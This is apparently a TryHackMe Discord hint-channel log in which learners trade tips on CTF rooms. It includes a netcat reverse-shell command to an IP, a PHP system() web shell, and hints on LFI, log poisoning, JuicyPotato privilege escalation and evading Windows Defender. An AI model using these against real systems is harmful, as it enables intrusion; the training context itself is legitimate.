#room-hints

1 messages Β· Page 81 of 1

opal vine
#

hi, guys im doing linux agency (i'm currently in as the user viktor)
and i'm just wondering when || when i want to give myself a shell using the crontab i first tried this command "nc -e /bin/sh 10.6.47.204 9999" but it didn't work || but why is that ? knowing that nc in installed on the machine+

pure thistle
pure thistle
#

there are 2 versions i dont know which is new or old but one ver has that flag the other ver removed that flag

opal vine
#

what flag are you talking about

pure thistle
#

||-e||

opal vine
#

oh

#

ok now i understood what you said before

#

yup that could be it

pure thistle
#

i used the long version of nc reverse shell from pentestmonkey' cheat sheet

opal vine
#

i used it too but it didn't work somehow
the bash one worked tho

formal wyvern
#

need some help in the cc: pen testing room πŸ™‚

pure thistle
#

ok

#

didnt know that but i do know sometimes its there and sometimes its not

#

like you said depends on how it was compiled

random thunder
#

Hey can someone explain me what happens when you add a domain in the /etc/hosts file?(Iam trying out archangel room)

silver otter
#

I googled for you cos it would be faster than explaining

#

this mostly covers it

random thunder
#

Got it thanks man

#

so it's simply a redirect for an IP to a domain name irrespective of taking it from the DNS records correct?

#

Ok yeah got it, that's a wrong word.

#

Understood.

white salmon
#

Hi there

Room Nmap
Task 14
Xmas Scan

i run the command for scan but i dont get any result
namp -sX -p 0-1000 "target machine"

kind bear
#

or you did that scan too early

white salmon
#

it's buggy sometimes

silver otter
#

well if you think about the question

#

Perform an Xmas scan on the first 999 ports of the target -- how many ports are shown to be open or filtered?

#

based on the result you got, what do you think a possible answer could be

white salmon
#

Thank you, the guys gave the clue about what's going on

silver otter
#

πŸ˜‰

sleek wolf
median compass
#

what's a word used for when you move goods out of a country? you ________ them

sleek wolf
#

||export || ?

median compass
#

then once you have that word, think of how it's used in linux

#

and maybe try using || ltrace || when you run the binary

sleek wolf
#

hmmm.... I'll give it a try. That's the problems when english is not your native language πŸ™‚

median compass
#

|| ltrace || gives you everything you need

white salmon
#

I'm using smbclient on a kali vm, any idea how I would open this file, Working From Home Information.txt ?

It doesn't seem to be liking the fact there are spaces in the title of it cri

median compass
#

you have to escape the spaces, that is, put a \ before them

#

so "My file name" becomes "My\ file\ name"

gusty kite
#

graaah toc2 is teasing me. I am sure I have the right way of getting the foothold but not working as expecting (just letting steam out here - I know rule13)

median compass
#

keep at it, you'll get there

gusty kite
#

hopefully. I am missing some piece of the puzzle.

white salmon
gusty kite
#

ahh got it D'OH! spelling bleeping error πŸ˜„

median compass
#

it happens, i was doing one of the boxes recently and kept on killing the server with a wrong log poisoning attack, over and over and over and ...

gusty kite
#

sounds like one of the new boxes a few days back

median compass
opal vine
#

hi, guys im doing the dogcat room
i used gobuster and found a directory called flag.php but it's empty
i tried LFI but nothing helps
what should i be doing?

median compass
#

more LFI πŸ™‚

#

that is the way

#

if you want a bigger hint then || sometimes you have to go forward to go back ||

#

lol

opal vine
#

i tried alot of "../" etc/passwd but the didn't help

#

i also tried the null byte

median compass
#

that's where my second clue comes in

#

there is a way with LFI to pull out the source of a file with ||base64||, try googling for it

opal vine
#

i tried all the exploits on the dog one

#

can i do something with the flag?

median compass
#

did you find any directories when you gobusted?

#

and no, the flag.php will be needed later, this is not the way

#

what message do you get when you try to do lots of ../ + etc/passwd?

opal vine
storm venture
#

hmm

#

sounds like

#

you need to try and bypass it

median compass
#

ok, so that's a message coming from the code right, must be some sort of check on what you entered

opal vine
#

oh

median compass
#

now re-read my first spoiler-marked hint again πŸ™‚

novel sparrow
#

toc2

stuck fractal
novel sparrow
pure thistle
#

ugggg don't you just love it when you are in the middle of compiling a exploit to upload to a machine and the time expires on a deployed machine

frank snow
#

when running the root script on chocolatefactory, || do I need to enter the 'key' in its decoded format? or enter it as is ||

pure thistle
#

i think it was as is

#

i could be wrong

frank snow
#

ah it worked, ||turns out I needed to enclose it in quotes ||

pure thistle
frank snow
#

as is

pure thistle
#

i thought so just wasn't 100% positive

chilly wigeon
#

@frank snow strings is good for you

pastel charm
#

hello brothers

#

i really need some help

#

i am new to try hack me

#

working on cyber defence

#

and stuck on sysinternals question about streams

wintry yarrow
#

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

  • What room you are on
  • At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
  • What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
pastel charm
#

sorry.

spice wharf
#

I need assistance on:
Network Services 2
Task 10
Question "Now we need to crack the password! Lets try John..."

What i have done:
||Taken the hash EA031893AA21444B170FC2162A56978B8CEECE18 saved it as a .txt. ran the hash through hash-identifier showing SHA-1 & MySQL5. From this I ran the hash.txt against john the ripper sudo john --format=raw-sha1 --wordlist=/usr/share/wordlists/rockyou.txt /home/joe/Documents/mysql_hack/hash.txt however i just get a scrambled mess. So I try john hash.txt but it never finds it.||

Any assistance is greatly appreciated.

candid nimbus
#

From what you've given you've missed a * off the hash. You might also use ||mysql-sha1|| as the format. Fix those and it should crack in seconds

spice wharf
candid nimbus
#

All the little things matter - The Wire πŸ˜€

spice wharf
candid nimbus
#

Nope. They come in many forms and sizes.

spice wharf
#

brilliant, I'll update my notes

candid nimbus
#

Try Hack Me has a few good hash cracking boxes which will show you more.

mighty nova
#

hey

#

can anyone help me with room linux agency

#

flag 25 hint

spice wharf
spice wharf
mighty nova
#

Ok

candid nimbus
#

Hint is don't follow any write-ups you might find as it's changed πŸ˜€

sleek wolf
#

Ok I really stack in flag25 @ LinuxAgency. All other flags, found easy in a matter of seconds. But this is hard, at least for me. Not even with the || ltrace || hint I've got from here.

sweet hound
#

same here, tried giving an argument to the binary, but nothing. I don't have to analyze it with Ghidra, do I ? Seems to complex compared to the flags before

sleek wolf
sweet hound
#

Got it

#

look up what ||getenv|| does

#

@sleek wolf

sleek wolf
sweet hound
sleek wolf
#

grrrr ... any other option? still I dont gotit

sweet hound
sleek wolf
#

I google it. I found ||ltrace -e getenc ./binary||

sweet hound
sleek wolf
#

I'll search more....

sweet hound
#

just typing in the command in google and reading the first lines of the first result did it for me @sleek wolf

sweet hound
sleek wolf
sweet hound
#

especially the first line there

#

in the pic

sour lintel
#

Hey guys!
I'm doing AoC2 day 14, and already found the pictures from Rudolphs parade, but I can't find any exif location data, I've already tried reverse image searching for higher resolution images, but none of them had the location data, any hints?

versed solstice
candid nimbus
sour lintel
#

Good, I'll find that!

fickle valve
candid nimbus
fickle valve
thin sigil
#

Hey, I am having trouble answering a question in a Sysmon room. It is the Task 4 question: "What is the UTC time created of the first network event in C:\Users\THM-Analyst\Desktop\Scenarios\Practice\Filtering.evtx".
I have run this command: ||Get-WinEvent -Path C:\Users\THM-Analyst\Desktop\Scenarios\Practice\Filtering.evtx -FilterXPath '*/System/EventID=3' -MaxEvents 1 -Oldest||
It returns: ||1/6/2021 1:35:52 AM||, but it is not the correct answer.
If I run Get-TimeZone, it returns UTC so shouldn't need any time conversion.
Placeholder for the question is: ********** :**:**.***, which is a bit weird.
So I have tried filling in the zeros like so ||01/06/2021 01:35:52 AM||, but that is still wrong.
Then I tried ||01/06/2021 01:35:52.UTC||, no success. I also tried swaping year, day, month around but still nothing. Oh, and i have also tried putting in the newest log time with that filter and no luck. Any suggestions?

candid nimbus
opal vine
#

how can i take advantage of a custom SUID?

candid nimbus
opal vine
#

thanks for the help

median compass
grim tapir
#

Hello there. Need some help in the Room: Relevant - pentesting challenge. I found out a way of reaching nt authority based on a set of priv available and i have indeed an exploit. But for some reason it doesn't run in the machine. I compiled it to 32 and 64 versions but none of those run on the machine (but it runs locally). Any help is appreciated.

median compass
#

it's almost as if windows had some sort of protection against privilege escalation πŸ™‚
try running this command ||powershell Get-MpThreatDetection|| and see if you can find your executable on the list

grim tapir
#

it returns empty :\

#

but i do have a certain message: The system cannot execute the specified program.

median compass
#

ok, basically windows defender blocks those commands

#

so you need to keep googling for a more recent exploit that isn't detected

grim tapir
#

got it

#

will look into it

#

thanks!

median compass
#

ok, that's a mess, let me try again lol

grim tapir
#

careful with the dir :p

tranquil brook
#

If a password hash starts with $6$, what format is it (Unix variant)?

median compass
#
ActionSuccess                  : True
AdditionalActionsBitMask       : 0
AMProductVersion               : 4.10.14393.0
CleaningActionID               : 2
CurrentThreatExecutionStatusID : 1
DetectionID                    : {478980A0-C8B8-4D26-9C01-E651A73C41BC}
DetectionSourceTypeID          : 3
DomainUser                     : IIS APPPOOL\DefaultAppPool
InitialDetectionTime           : 8/24/2020 1:42:58 PM
LastThreatStatusChangeTime     : 8/24/2020 1:44:04 PM
ProcessName                    : C:\Windows\System32\cmd.exe
RemediationTime                : 8/24/2020 1:44:04 PM
Resources                      : {file:_C:\inetpub\wwwroot\XXXXXXX\JuicyPotato
                                 .exe}
ThreatID                       : 2147757908
ThreatStatusErrorCode          : -2142207965
ThreatStatusID                 : 3
PSComputerName                 : 
grim tapir
#

it is weird because if i try to run it in the PS i get 'failed to run: The file or directory is corrupted
and unreadableAt line:1 char:1'

tranquil brook
#

If a password hash starts with $6$, what format is it (Unix variant)?

woven mirage
median compass
grim tapir
#

roger that, will try to find another one

patent phoenix
#

Anyone to help with MITRE ROOM. Task 7. Last 2 questions

viral sky
#

For the crack the hash 1 room

#

For the bcrypt hash, the hint specifies trying "other methods that start with b"

#

Its just none of the other methods that start with 'b' make sense for the hash. Like the example hash doesn't line up with the question hash

sour lintel
#

I can't finish day 14 of AoC, as I need to access Scylla.so and it's down, is there another alternative (that it's free?)

#

Or maybe I could get to the leaks myself, I've found half the password in BreachDirectory, but this is it...

#

Actually, I've sent a message to the maintainer of Scylla but still didn't got any response (I believe that is way too much isn't?)

candid nimbus
patent phoenix
distant tartan
#

every time i terminate my machine and re deploy it in linux agency task 4 i have to privsec -4 users every time to get the next one its is it only way o do that or is there any other ways to login s the user where we terminated the machine and also i know the flags of all the prvious users

median compass
#

you can check what users can SSH into the box, then once you get one of those you can so straight to it, just tail /etc/ssh/sshd_config

distant tartan
median compass
distant tartan
median compass
#

but that's what the command I gave you does

#

if you run it you'll find a list of users that can SSH in

distant tartan
distant tartan
median compass
#

no, if a user is on that list and you have already found their password then you can go in directly as that user

white salmon
#

hi how did you fix the issue? any idea what is causing?

grim tapir
#

@median compass got it

#

tried to get a compiled version of my exploit (after trying to bypass applocker) and found a version of it

#

for some reason my own compiled version gets locked

#

and this one doesnt

#

=\

median compass
#

defender is looking for encoded sequences, if enough people use msfvenom (or whatever) to encode an exploit then the same strings get created and eventually associated with the exploit. a different encoding or way of doing something can then slip past until it in turn gets well known and used often

grim tapir
#

yeah but in my case i just grabbed the project and compiled the exe

#

same size, same arch

#

the one i got after searching is the same thing, so something i am doing in VS is flagging it

#

maybe because i am using a newer windows sdk or something

#

(the project from the exploit)

#

anyway, thank you vm for the help πŸ™‚

astral radish
simple mountain
#

Do not provide or ask for help or hints for Classic Passwd room until 10th Feb, 7pm (GMT)

candid nimbus
wicked bolt
#

Does anyone know if hydra is possible to use on Jenkins? (doing Internal room rn) but yeah when i cURL i get a Crumb error which supposedly is linked to the current user session but nothing appears in dev console, so it's server side?

candid nimbus
simple mountain
#

Eh... Hydra should be a last resort

wicked bolt
#

I'll just use Zap i guess

carmine frigate
#

hey does anyone know of in "The Marketplace" room we need to use hash cracking for the bcrypt hash?

cedar axle
#

@carmine frigate no cracking required

quartz grove
#

just rooted the "BioHazard" box, and I dunno if I'm just being stupid but I can't answer one of the last questions to be able to mark the box as complete...

ashen scaffold
#

@quartz grove should just be the root flag, no?

quartz grove
#

no, it was lame... I just figured it out

#

it wasn't the root flag it was one of the questions

ashen scaffold
#

Glad you did. Im actually gonna do that room, looks interesting

quartz grove
#

it was OK, bit too CTFy though

ashen scaffold
#

Oh well. Root it anyways.

quartz grove
#

waaay ahead of you πŸ™‚

tawny remnant
#

<?php system($GET_['cmd'])?>

#

what does that do?

#

does there have to be a cmd file for that to work

solemn smelt
#

basically just spawns a cmd process as a GET request

tawny remnant
#

ah alr

#

thanks

drowsy sequoia
#

I got at the ||cms installation page|| on toc2 any hints what to do further

leaden ingot
# tawny remnant <?php system($GET_['cmd'])?>

when you do anything with php and you don't understand about them, let search it, read php docs php.net .
if you input: ls and that mean: $_GET['cmd'] = ls, code will be: <?php system('ls') ?>

#

in linux, this command will list all files and directories in your directory

patent phoenix
#

@candid nimbus I tried but no luck. Please share the link which you are referring to. I am doing something terribly wrong. Stupid to ask but I am looking for answers

candid nimbus
distant tartan
ripe hedge
drowsy sequoia
#

Okayyy no problem will give it another grind

candid nimbus
stuck fractal
#

You can't

#

Not until it's approved on the room

ornate pumice
#

Ok, glad I asked before spitting out the link. Thanks @stuck fractal

#

Rule #14... gotcha. slaps own hand

silver otter
#

it does teach you about 'directory traversal' but you should recognise it a bit as 'path' like if you cd ".." it takes you back a level

#

seems to be a common technique in LFI based vulnerabilities (I haven't done archangel yet, never gonna give it up tho).

vapid verge
#

There is nothing to look for bro
Still thank you

patent phoenix
wicked bolt
#

you can read the source code of the page you're accessing, using LFI

storm venture
#

sure, pm

trim haven
#

I deleted that because it was a massive spoiler.

lunar musk
#

Hi

dusky plinth
#

Hi guys, i am doing the beginner ctf called "linux Challenges". I allready having problem with finding flag3. The question ist:Flag 3 is located where bob's bash history gets stored? - isn't it stored in /home/bob/ ?

stuck fractal
#

That's not Linux Fundamentals

#

That's Linux Challenges or linuxctf

dusky plinth
#

oh, your right. sry i will change it in my question

stuck fractal
#

It's stored in that folder, sure

dusky plinth
#

I cant send dpic's but it's not there

stuck fractal
#

It is

#

If you are the correct user and look in the correct file

dusky plinth
#

i'm bob, locking in /home/bob

#

can you only tell me is that correct?

stuck fractal
#

That is the correct folder. But you need to look in a file.

dusky plinth
#

thank you

#

i will try

#

oh wow. that was so easy... shame on me πŸ˜„

dusky plinth
#

sorry, but i have to ask again. I do not get the right "find" command to get flag5 of "Linux Challenge" can some body give me a hint? These are some of my try's: find /, find /home/bob, find/home/garry, find / -name flag5, find / -perm g=w,...

trim haven
#

What's the task, sorry?

dusky plinth
#

Find and retrieve flag 5. xD

trim haven
#

Well, knowing the name of the file is hard and essentially the key here.
First, I would highly suggest to put 2>/dev/null on the end of your find commands as this will filter out all the Permission denied errors.

As you do not know the flag file name, I would suggest using the third command but replace the file name with flag to widen your search, if it does not find a file named flag5.

dusky plinth
#

thank you so much. I will try get the flag with this information.

#

got it, my fault was to search for -name flag5 and not -name flag5.txt

trim haven
#

Hah, completely missed that.

dusky plinth
#

now i've learned it xD πŸ˜„

cyan sage
#

Hi guys

#

What means "send money to another country"

#

I am trying to Solve mission25 un Linux agency room

glacial gust
spice narwhal
#

hello all πŸ™‚ Anyone available to help with the Sysinternals room?

astral smelt
#

Which bit are you stuck on?

spice narwhal
#

I tried the both addresses in the screenshot but the lookup fails

#

when I try, it returns "The requested name is valid, but no data of the requested type was found."

astral smelt
#

Hmm, never had that problem when testing it, maybe use an online whois tool

spice narwhal
#

huh..thanks! That did the trick

#

I used domaintools and it worked...wonder why it didn't work on cmd 😦

#

well thanks ^_^

#

😦 @astral smelt any advice on why the last question won't accept the correct path?

cyan sage
spice narwhal
#

nvm about my issue...I fixed it πŸ˜›

ornate pumice
ripe hedge
vapid verge
#

Any hints for classicpasswd??

stuck fractal
#

72 hours from release

vapid verge
#

Reverse engineering is hard

candid nimbus
#

Do a try hack me reverse engineering box in the meantime then. Should teach you everything you need to know πŸ˜€

gusty kite
# vapid verge Reverse engineering is hard

go do one of the other RE rooms and get acquainted with the tools. They will do most of the work for you in the classicpassword room and make it easy for you to solve

kindred socket
#

Hey people!!
Did someone manage to solve the physical security intro room?

I am at the last question, the one about Adams Rite Hardware and I don't get it. I mean I know what to do to prevent the bypass but I can't find the word for it. I am also not a English native so that makes it a bit tougher.

Anyway, really cool room but super hard to solve πŸ˜‚πŸ˜‚

Hints are really appreciatedπŸ™πŸ˜Š

spring tartan
kindred socket
#

I would go with rockyou

pure thistle
#

anybody help me out with overpass 3 having trouble ||mounting the share|| tells me ||nfs file type and transmission protocol|| are not valid

kindred socket
#

There is a knight πŸ˜‚

#

Try rockyou then ;-)

white salmon
kindred socket
#

It's in my rockyou.txt 100β„….

kindred socket
#

Woopie I found the answer, thanks to both of you ❀

digital vector
digital vector
#

nvm found it

supple cove
#

Hey, I have a question about Simple CTF room

white salmon
#

Hello guys, can anyone give a nudge for retro?

astral smelt
#

Which part are you on?

white salmon
#

find hidden directory and now enumerating but couldn't find any userful thing ):

astral smelt
#

If you keep looking you will ||find creds on that secret directory ||

white salmon
supple cove
#

Do the exploits from searchsploit need to be edited for syntax?

#

In the Simple CTF room?

#

No matter what version of python I run it on, it gives syntax errors and won't actually do anything.

astral smelt
#

Iiirc that's python2 for SimpleCTF

supple cove
#

Correct

trim haven
#

Read the error.

#

If you don't know the error, google it

#

Because that one very clearly is not a syntax error πŸ˜‰

supple cove
#

Ok, so it's missing a module. Seems weird for a THM Attack Box.

trim haven
#

As many different exploits require different modules, the AttackBox dev (CMNatic) isn't going to install them all, you can request it in the feedback form although #feedback-and-ideas

supple cove
#

Awesome, thanks!

pure thistle
supple cove
pure thistle
#

ok was just curious cause if its the room i think it is i don't remember using searchsploit

pure thistle
#

if its the room i think it is i just installed the cms to get revshell then lxd to priv esc to root

supple cove
#

Nice!

#

Didn't think of that. I searchsploit evvvverrryythinnng

pure thistle
#

lol i was just curious cause it was an interesting command you were running

pure thistle
#

cool

dusky plinth
#

i am doing the Linux Challenges in Linux Fundamentals. I am searching for flag 23. I found it but i have to reverse it. I don't know how to do so. Can some body give me a hint?

astral smelt
#

There's a command you can use to reverse it and please don't post flags

dusky plinth
#

thank you, i will search for it.

ruby cloud
#

Anybody for hint on the first question on the AWK section in the room https://tryhackme.com/room/linuxmodules ? I got the second one already, and the first one I get the same output than the question asks for but the first curly braces contain 6 extra characters I'm not using and can't figure them out. Tried reading the manpage of awk and the tutorials the creator links in the exercise but there is no way I can figure the answer out

#

^^^ ah nvm, finally got it lol

white salmon
#

i found a filter.php file in the "upload vulnerability" room, how do i look at the source code

#

or is this a rabbit hole, me trying to get this file ?

restive zinc
#

can I get some hint on Linux Modules https://tryhackme.com/room/linuxmodules task 09? I have used sort and uniq and cat them with '-n' flag. But I keep getting the 2271st word and the line number of word 'michele' not correct. I checked the result and words are sorted. Find it a little hard to figure out what I missed

#

ok nvm, I solve it with kali linux. Originally I tried this on wsl ubuntu and the sorted result seems to be different from different os. idk, maybe I should take some time on those

restive zinc
#

okay now i got it. Its my $LANG being 'C.UTF-8'. I changed it to 'en_US.UTF-8' and I get the different result. anyway this is a very good room to learn and play

blissful musk
#

does anyone have idea about this ? It's in the Convert my video room !! Tried www-data , apache but didn't work

storm venture
#

what other users are on the box

#

cat /etc/passwd | grep sh is a good trick to see anyone who has capabilities of getting a shell

#

@blissful musk

blissful musk
#

@storm venture tried all those users , but it didn't had the correct one !!

storm venture
#

that's odd

#

the number of characters doesn't nearly match any of those users

#

are you sure there's not another account on the box

#

you could also do ls -la /folder/.. | grep folder to see who owns it?

real lynx
#

has anyone tried toc2, I'm stuck at root and can't understand the ||readcreds.c|| code

blissful musk
#

@storm venture Got it !! There was a hidden file in which there was the username , thanks for helping out πŸ™‚

real lynx
storm venture
#

ayy nice, good job @blissful musk

pure thistle
real lynx
pure thistle
#

user is part of a certain group the is easily exploited

gusty kite
supple cove
gusty kite
supple cove
#

lol nice!

gusty kite
pure thistle
#

oh ok i was going off what liveoverflow was doing in his video will try again when i get home from work tonight

gusty kite
thorn dagger
#

for the network services 2 room
"Now, use /usr/sbin/showmount -e [IP] to list the NFS shares, what is the name of the visible share?"

#

what command should I be using for that?

#

nvm

#

kinda confusing cause just ||showmount -e [ip]|| worked

pure thistle
thorn dagger
#

Alright, thanks Knight

tame oyster
#

Well known ports? Says 0-1023 online but when I type it in says wrong, any suggestions πŸ˜‚

#

Typed 1024 it worked πŸ˜‚

pure thistle
# thorn dagger Alright, thanks Knight

not complaining just explaining if you do a which showmount and it shows somewhere else then the relative PATH that they are telling you to use it won't work just saying not judging πŸ˜‰

#

i know typing is not my strong suit lol

hazy sequoia
#

good day all, got a question about OWASP top 10 task 18 part 3.... Is it broken? Because outside of the first page they DIRECT me to, every other page I try come sup blank, got all the way to 100.... BLANK

#

Anyone else have this issue?

#

also after x amount of tries the room just stops responding

thorn dagger
#

I got the answer i needed but why did running the same command twice produce different results what is the reason for this? here's the permission changes from download to me reaching the desired result

#

the last two images are the ones in question

silver otter
#

its something to do with suid permissions

#

s' If the setuid or setgid bit and the corresponding executable bit are both set.

S' If the setuid or setgid bit is set but the corresponding executable bit is not set.

#

now as to why you would have to run the command twice for it to go from nothing > S > s I'm not 100% but its probably related to how they work

#

maybe because you didn't specifcy +xs

foggy ridge
#

Hi guys,
I am at the beginner Pickle Rick room.

So far I:

||looked around with a browser and found:

In / (root) there is a comment with username:
R1ckRul3s

Server:
Apache/2.4.18 (Ubuntu) Server

(I searched about this version and found that it is vulnerable but no exploits in exploit-db)

=======

used nmap and found:

open ports:
22 ssh
80 http/website

hidden directories:
/assets not hidden, but it is a directory
/robot.txt nothing interesting
/login.php input fields

=======

used Burp Suite Community Edition (free) (learned to use Proxy and Intruder from outside sources due to paywall in THM):

basic SQL injections didn't work in /login.php:
' or 1=1--
R1ckRul3s'--

DOM-based XSS not working
XXE not working (or at least I think so)

no cookies that are revealing anything

right now I am at the painful process of brute forcing using intruder which stops searching after ~70 trys (and I have to manually remove the tried passwords, cancel the unmoving attack and start a new attack) because it is the free version. I am using best1050.txt. At the time of writing it reached letter m but I doubt brute forcing will yield a result at all.

=======||

Right now I am kinda stuck.

Please point me in the right direction.
Is there something I am missing?

Thanks in Advance!

grim hollow
silver otter
foggy ridge
foggy ridge
distant tartan
#

hey i have base 64 executible file i have to decode it there was a cmd to do so starting from echo can any one tell me that cmd

stuck fractal
#

Room task question.

distant tartan
foggy ridge
#

does the normal base64 -d not work?

#

@distant tartan

#

or does it not work with exeutables?

distant tartan
foggy ridge
#

a vs caps lock

distant tartan
distant tartan
simple mountain
#

Do not provide or ask for help or hints for En-pass room until 13th Feb, 7pm (GMT)

tranquil ivy
#

hey guys i need some help in nessus room
i deployed the machine and ran the basic network scan
and only 3 vuln got displayed
i did the scan couple of times but i cant see the port scanner option anywhere or any apache server version
plz help

versed solstice
versed solstice
tranquil ivy
versed solstice
tranquil ivy
#

but i didnt get any tab

versed solstice
#

2.4 is common..

tranquil ivy
#

the problem is that it should be displayed
why isnt it
what did i do wrong

versed solstice
tranquil ivy
#

yeah

tranquil ivy
gusty kite
#

uhh new room today.

versed solstice
versed solstice
#

or like 2.xx.xx but its probably 2 as the first number

#

@tranquil ivy whats the ip your trying to scan?

#

@tranquil ivy also what version of nessus are you running?

tranquil ivy
versed solstice
tranquil ivy
versed solstice
#

rn I'm getting my nessus set up

tranquil ivy
versed solstice
versed solstice
tranquil ivy
#

around 8 mins

versed solstice
#

@tranquil ivy odd I just scanned and looked through somethings and found apache version ||2.4.99||

#

^^^^^^ and it works use ^^^^^^^

tranquil ivy
#

u used nessus???

versed solstice
#

ye i used nessus, idk what

#

i did i just randomly did stuff

#

that was my first time using it, but i guess it worked

tranquil ivy
#

how

versed solstice
# tranquil ivy how

well I did a scan and I went to a nessus tutorial and clicked a few things and found it

tranquil ivy
versed solstice
tranquil ivy
versed solstice
#

on the challenge page

tranquil ivy
#

hmmm

versed solstice
#

here I'll go screenshot the output

#

btw if you need to theres always no harm in going to writeups @tranquil ivy

tranquil ivy
gusty kite
#

heh nice to see that I am not the only one finding the new room more difficult than the label... one got through sofar.

versed solstice
red arch
#

Hey guys I am trying the Linux Modules room and at task 6 at the first question I managed to have that output but it doesn't accepts my answer and my answer differs from the placeholder.. Any help ?

tranquil ivy
versed solstice
# tranquil ivy nope

well basically inside that theres a apache version vuln you can check and find it

tranquil ivy
#

output

versed solstice
versed solstice
tranquil ivy
versed solstice
versed solstice
tranquil ivy
#

yeah ok

versed solstice
#

btw did you do a host discovery scan?

#

and basic network scan after that?

#

then do credentialed patch audit

tranquil ivy
#

ok i will do that then

versed solstice
#

@tranquil ivy and when you do basic network scan do patch audit scan then a web application test if that doesnt work btw

#

did it work?

versed solstice
#

btw just dm me if you need anymore challenge help, I'm not on often tho

#

^﹏^

tranquil ivy
#

yeah sure will

versed solstice
#

ight I'm gonna go help the guy in room help bye!

tranquil ivy
gusty kite
#

must be too tired for the new en-pass room. I am missing something obvious. It is supposed to be easy πŸ˜„

cursive star
#

@gusty kite same here

gusty kite
languid trench
#

you and everyone else who tried. There is no way no one could found a solution in an easy room

#

πŸ€·β€β™‚οΈ

cursive star
#

Yep not really speaking for good room quality IDK

gusty kite
#

but one person finished.

cursive star
#

That makes it even more weird IMO

gusty kite
#

yeah

manic citrus
languid trench
#

The only "hint" we got is that we are missing something really obvious, so i don't know how could i help you since only one has rooted the box

green brook
#

Is anyone no the en-pass room

light hemlock
green brook
#

Im not so familiar with discord

#

Where is that

light hemlock
rose cape
#

Hi can someone give me a hint for root on gatekeeper by themayor?

light hemlock
green brook
#

Yeah i saw it

light hemlock
green brook
#

Me or elbee

#

NVM

light hemlock
#

I was talking to elbee @green brook

rose cape
#

@light hemlock ive got my shell, ive used winPeas and metasploit exploit suggestor, just having trouble finding the privesc point and ive enumerated alot.... must be missing something

light hemlock
#

Try using another module from metasploit for enumeration

rose cape
#

thank you

#

❀️

light hemlock
inland onyx
#

@cursive star @gusty kite, mind DMing me with what you're doing in enpass?
I can check against the writeup to see if there's a problem with it πŸ™‚

cursive star
#

I got it @inland onyx thanks!

inland onyx
#

Awesome πŸ˜„

light hemlock
#

Can I DM? @inland onyx

inland onyx
#

You can, but if it's confirmed to be working then there won't be any hints πŸ‘€

light hemlock
#

No I'm not asking for hints

#

I got the 1st part though in a way I didn't like. I'll explain more in DM

#

maybe you can help!

indigo acorn
#

In the burpsuite room the instructions say "Parse through the various responses we've received from Juice Shop until you find one that includes a 'Set-Cookie' header."

I can't find any with 'Set-Cookie', only 'Cookie'.

Have I done something wrong in a previous step or is 'Cookie' and 'Set-Cookie' the same?

haughty mauve
indigo acorn
#

Oh, thanks.

fallow brook
#

anyone on En-Pass room ?

cold crag
fallow brook
#

dm

ornate pumice
#

I'm also stuck with the pass in hand from reg...

shell crater
#

Don't know what's wrong but the "windows/smb/ms17_010_eternalblue" exploit is failing constantly in the Blue room's target VM

#

does anybody have any idea what to do there ?

terse ember
stuck fractal
#

@dawn mango Not yet.

#

!rule 13

proud scarabBOT
#

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.

dawn mango
#

ohhh So before time it is not possible?

stuck fractal
#

No. You're just not allowed to ask for help or hints before 72 hours have passed

dawn mango
#

opsss sorry. Thanks for the rule.

storm venture
#

yeah, I've had a couple of issues with it, how can I help though?

cursive star
ripe hedge
#

I've got a thing but am missing one critical piece of info

#

I'm assuming that the encoded bit is useful, but doesn't seem to be

stuck fractal
#

!rule 13

proud scarabBOT
#

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.

stuck fractal
#

@crisp burrow Don't ask for help or hints until 72 hours have passed please

#

Please don't ask the same question across multiple channels

white salmon
#

Sorry my bad

#

Hello anybody wanna teamup to "En-pass" and "Keldagrim" ? πŸ™‚

stuck fractal
white salmon
#

@white salmon I'm on En-pass atm

magic oriole
#

What command can we run to find out more information regarding the current user? in meterpreter shell and it is a windows machine

stuck fractal
#

That sounds like a research question

#

There's a great page of meterpreter basics

magic oriole
#

I am in the metasploit room

stuck fractal
#

Ok

#

Doesn't matter

#

I recommend research

#

Under rule 13 specifically

magic oriole
#

should I specifically search for meterpreter shell or windows cmd commands?

stuck fractal
#

You're in a meterpreter

magic oriole
#

yup

stuck fractal
#

I recommended a page to look for.

magic oriole
#

got a page of kali for meterpreter basics

stuck fractal
#

Ok, so have a read

#

Research involves a lot of reading and googling

#

And you NEED to do it before asking here

magic oriole
stuck fractal
#

That's incredibly rude

magic oriole
stuck fractal
#

There's plenty.

magic oriole
#

after u told search for meterpreter I got a useful page

#

anyway thanx

stuck fractal
#

You should be doing research before asking here. Rule 13.

magic oriole
#

kk will remember that

silver otter
#

no hints for that room yet

#

72hours till hints unlock!

solemn onyx
#

that's not a hint am asking... just wanna confirm...

#

umm nvm I'll wait then

stuck fractal
spring tartan
#

are we able to ask for hints yet on Linux modules room?

stuck fractal
#

Yes

astral smelt
#

Yep, it's a walkthrough

spring tartan
#

need a hint for task 6 Download the above given file, and use awk command to print the following output:

ippsec:34024
john:50024
thecybermentor:25923
liveoverflow:45345
nahamsec:12365
stok:1234

#

i put

#

awk 'BEGIN{OFS=":"} {print $1,$4}' awk.txt

#

and it had given me the result.. but it seems not to be correct for the question

#

that query did output ippsec:34024
john:50024
thecybermentor:25923
liveoverflow:45345
nahamsec:12365
stok:1234

solemn onyx
spring tartan
#

i been stuck on it for past 2 days

solemn onyx
#

If you remember, FS is used as a field separator... for inputting the data from either stdin or a file (may be redirection)

silver otter
solemn onyx
solemn onyx
#

and it will accept the answer

spring tartan
#

cool.. thanks for that

solemn onyx
#

np πŸ˜‰

spring tartan
#

i had been looking at hour long videos on AWK and that and racking my brain bad

#

on youtube

#

thanks for that !

silver otter
#

did you click the hint button

#

lol

solemn onyx
